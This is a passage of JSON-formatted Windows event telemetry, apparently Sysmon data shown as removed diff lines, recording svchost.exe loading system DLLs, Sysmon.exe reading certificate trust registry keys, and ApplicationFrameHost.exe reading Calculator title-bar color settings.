"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "CapabilityAccessManager.dll", - "image_path": "C:\\Windows\\System32\\CapabilityAccessManager.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 